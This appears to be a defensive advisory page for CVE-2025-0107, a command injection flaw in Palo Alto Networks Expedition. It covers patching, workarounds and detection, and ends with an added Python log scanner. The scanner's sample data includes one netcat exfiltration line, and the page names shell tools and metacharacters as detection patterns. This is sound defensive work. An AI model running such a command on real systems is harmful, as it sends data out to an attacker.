CVE-2025-0107
📋 TL;DR
An unauthenticated OS command injection vulnerability in Palo Alto Networks Expedition allows attackers to execute arbitrary commands as the www-data user. This can lead to theft of sensitive data including cleartext passwords, device configurations, and API keys for PAN-OS firewalls. Organizations using Expedition for firewall migration and management are affected.
💻 Affected Systems
- Palo Alto Networks Expedition
📦 What is this software?
Expedition by Palo Alto Networks, a tool used for firewall migration and configuration management of PAN-OS firewalls.
⚠️ Risk & Real-World Impact
Worst Case
Complete compromise of Expedition server leading to credential theft, lateral movement to managed firewalls, and potential network-wide compromise.
Likely Case
Data exfiltration of firewall credentials and configurations, enabling further attacks against the firewall infrastructure.
If Mitigated
Limited impact if Expedition is isolated, monitored, and access is restricted to trusted networks only.
🎯 Exploit Status
OS command injection vulnerabilities are typically easy to exploit once the injection point is identified.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: Check PAN-SA-2025-0001 for specific fixed version
Vendor Advisory: https://security.paloaltonetworks.com/PAN-SA-2025-0001
Restart Required: Yes
Instructions:
1. Review the PAN-SA-2025-0001 advisory.
2. Download and install the fixed Expedition version from the Palo Alto Networks support portal.
3. Restart Expedition services.
4. Verify that no unauthorized changes occurred before the patch was applied.
🔧 Temporary Workarounds
Network Isolation
Restrict network access to Expedition to only trusted management networks
Configure firewall rules to limit Expedition access to specific source IPs/networks
Access Control
Implement additional authentication layers before Expedition
Deploy VPN or reverse proxy with authentication in front of Expedition
🧯 If You Can't Patch
- Immediately isolate Expedition from internet and restrict to minimal necessary internal access
- Monitor Expedition logs aggressively for suspicious command execution patterns
🔍 How to Verify
Check if Vulnerable:
Compare the installed Expedition version against advisory PAN-SA-2025-0001. If the installed version predates the fixed version, assume it is vulnerable.
Check Version:
Check Expedition web interface or appliance management console for version information
Verify Fix Applied:
Verify Expedition version matches or exceeds the fixed version specified in PAN-SA-2025-0001
📡 Detection & Monitoring
Log Indicators:
- Unusual command execution in Expedition logs
- Unexpected www-data user activity
- Suspicious outbound connections from Expedition
Network Indicators:
- Unexpected traffic from Expedition to external IPs
- Anomalous authentication attempts from Expedition to managed firewalls
SIEM Query:
source="expedition" AND (process="bash" OR process="sh" OR cmdline="*;*" OR cmdline="*|*" OR cmdline="*`*`)
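The SIEM query above can also be applied to exported logs when no SIEM is available. The following is an added example, not part of the original advisory and not Palo Alto Networks code: it parses key=value process-execution records, applies the same logic (Expedition source, shell process or shell metacharacters in the command line) and ranks each hit, treating www-data as the higher-risk user because that is the account the vulnerability runs commands under. The log format and the sample lines are constructed for illustration; adapt parse_line to whatever your process-audit source actually emits.

```python
import re

# Shell binaries and metacharacters the advisory's SIEM query looks for.
SHELL_PROCESSES = {"sh", "bash", "dash"}
METACHARS = (";", "|", "`")

# Matches key=value pairs, with the value either double-quoted or bare.
KV_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')

# Constructed sample records (not real Expedition output).
SAMPLE_LOGS = [
    'source=expedition user=www-data process=php cmdline="php-fpm: pool www"',
    'source=expedition user=www-data process=sh cmdline="sh -c \'ls /tmp; id\'"',
    'source=expedition user=root process=bash cmdline="bash /opt/backup.sh"',
    'source=expedition user=www-data process=bash cmdline="bash -c \'cat x | nc 10.0.0.5 4444\'"',
    'source=other-host user=www-data process=sh cmdline="sh -c \'id\'"',
]


def parse_line(line):
    """Parse one space-separated key=value record into a dict."""
    return {key: (quoted or bare) for key, quoted, bare in KV_RE.findall(line)}


def classify(event):
    """Apply the advisory's SIEM logic to one parsed event.

    Returns None when nothing matches, otherwise (severity, reason).
    Severity is a hypothetical ranking: shell + metacharacters under
    www-data is 'high', either alone under www-data is 'medium', and
    any other match is 'low' so it can still be reviewed.
    """
    if event.get("source") != "expedition":
        return None
    proc = event.get("process", "")
    cmd = event.get("cmdline", "")
    is_shell = proc in SHELL_PROCESSES
    metas = [m for m in METACHARS if m in cmd]
    if not is_shell and not metas:
        return None
    is_www = event.get("user") == "www-data"
    if is_www and is_shell and metas:
        severity = "high"
    elif is_www:
        severity = "medium"
    else:
        severity = "low"
    parts = []
    if is_shell:
        parts.append(f"shell process {proc}")
    if metas:
        parts.append("metacharacters " + " ".join(metas))
    return severity, "; ".join(parts)


def scan(lines):
    """Return a list of findings (line number, severity, user, reason)."""
    findings = []
    for number, line in enumerate(lines, 1):
        event = parse_line(line)
        result = classify(event)
        if result is not None:
            findings.append({
                "line": number,
                "severity": result[0],
                "user": event.get("user"),
                "reason": result[1],
            })
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOGS):
        print(f"line {finding['line']}: {finding['severity']} "
              f"({finding['user']}) {finding['reason']}")
```

On the constructed sample the scan flags lines 2 and 4 as high (www-data running a shell with `;` or `|` in the command line) and line 3 as low (a root-run backup script, which matches the shell clause and is worth a look but is not the pattern this vulnerability produces). Raw metacharacter matching is noisy on any host that runs legitimate shell scripts, so baseline what Expedition normally executes before alerting on every hit.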